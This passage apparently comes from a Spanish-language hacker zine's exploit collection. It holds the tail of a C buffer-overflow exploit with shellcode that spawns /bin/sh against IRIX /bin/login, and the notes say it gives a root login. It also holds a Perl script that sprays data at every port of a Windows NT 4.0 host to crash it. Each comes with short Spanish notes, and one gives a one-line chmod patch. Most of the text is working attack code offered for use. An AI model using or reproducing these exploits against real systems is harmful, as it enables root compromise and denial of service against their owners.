    0x240203f3,         /* li $v0,1011          */
    0x03ffffcc,         /* syscall 0xfffff      */
    0x2f62696e,         /* "/bin"               */
    0x2f7368ff,         /* "/sh"                */
};

char buf[BUF_LENGTH + EXTRA + 8];

void main(int argc, char **argv)
{
    char *env[] = {NULL};
    u_long targ_addr, stack;
    u_long *long_p;
    int i, code_length = strlen((char *)irix_shellcode)+1;
    u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;

    stack = get_sp();

    long_p =(u_long *)  buf;
    targ_addr = stack + OFFSET;

    if (argc > 1)
      targ_addr += atoi(argv[1]);

    while ((targ_addr & 0xff000000) == 0 ||
           (targ_addr & 0x00ff0000) == 0 ||
           (targ_addr & 0x0000ff00) == 0 ||
           (targ_addr & 0x000000ff) == 0)
      targ_addr += 4;

    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
        *long_p++ = IRIX_NOP;

    for (i = 0; i < code_length/sizeof(u_long); i++)
        *long_p++ = irix_shellcode[i];

    for (i = 0; i < EXTRA / sizeof(u_long); i++)
        *long_p++ = (targ_addr << 24) | (targ_addr >> 8);

    *long_p = 0;

    printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);

    execle("/bin/login", "login", "-h", &buf[1], 0, env);
    perror("execl failed");
}
<-->

Descripcion y Notas:

Cuando se ejecuta el exploit, nos pide una clave. Le damos a enter sin
teclear nada y estamos dentro con privilegios de root.

El patch es tan sencillo como ejecutar:

chmod u-s /bin/login


-( 0x10 )-
Para	 : Windows NT 4.0
Tema	 : Crash
Patch	 : Maybe SP3, Maybe LINUX
Creditos : Bob Beck

<++> set_016/exploits/nt.pl
#!/usr/local/bin/perl

use Socket;
use FileHandle;
require "chat2.pl";

$ILoveBill = $ARGV[0] && shift;

$verbose = 0; # tell me what you're hitting
$knownports = 0;  # don't hit known problem ports
for ($port = $0; $port<65535; $port++)
{

  if ($knownports && ($port == 135 || $port== 1031)) {
      next;
  }
  $fh = chat::open_port($ILoveBill, $port);
  chat::print ($fh,"Windows NT is the platform of the future");
  if ($verbose) {
          print "Trying port: $port\n\n";
  }
  chat::close($fh);
}
<-->

Descripcion y Notas:

Pues el mismo problema de siempre, el clasico con el puerto 135, el origen
de los nukes... pero en el puerto 1031, esto es, inetinfo.

Creo que ya lo hemos dicho en mas de una ocasion... Pero sigue fallando.